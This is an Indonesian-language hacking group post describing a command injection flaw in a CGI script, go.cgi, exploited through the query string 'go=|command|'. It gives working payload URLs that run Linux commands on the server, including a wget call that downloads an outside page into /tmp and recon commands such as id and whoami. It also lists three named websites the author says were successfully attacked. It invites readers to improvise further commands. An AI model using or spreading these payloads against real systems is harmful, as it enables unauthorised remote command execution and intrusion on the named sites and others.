Author : Bwi FuckingTeam
cgi-bin/go.cgi?go=|[command]|

Lagi lagi bug baru dari /cgi-bin/. Target memang rada rada sedikit, apakah karena belum dipublikasikan atau memang para webmaster tdk suka menggunakan cgi-bin.go.cgi belum jelas. namun dari pencarian yang penulis lakukan, masih sedikit yang menggunakan tools tersebut. 


lebih lanjut...
bug ini sama seperti yang bug lain, yaitu kita tetap bekerja di web browser. 
Berikut ini syntax penulisannya yaitu : 

http://www.domainname.com/cgi-bin/go.cgi?go=|command| 

Dibagian command kita bisa memberikan perintah perintah linux. Karena memang target ini adalah linux. 

Beberapa contoh perintah yang bisa kita terapkan antara lain : 
1. wget 
http://www.domainname.com/cgi-bin/go.cgi?go=|wget www.jelaga-online.org/index.html -O /tmp/test.html| 

2. id, ls -al, whoami, http://www.domainname.com/cgi-bin/go.cgi?go=|id| 

dan yang lain lainnya tergantung dari improvisasi anda. 

Dari beberapa yang penulis coba, ternyata mendapatkan OS REDHAT, DEBIAN dan FreeBSD. Mungkin bagi teman teman yang lain bisa menemukan improvisasi yang lain. 


Beberapa target yang berhasil penulis test antara lain : 
1. www.canada-immigrating.com 
2. www.messiahpage.com 
3. www.lpwi.org 

Mungkin sekian dulu, dan #renjana sangat menngharapkan masukan masukan dari yang lain, agar share ilmunya tetap terjalin. 

Thanks : 
Phaty atas sample nya 
Teman teman semuanya dalam FuckingTeamCREW. 

Keep on Learn everything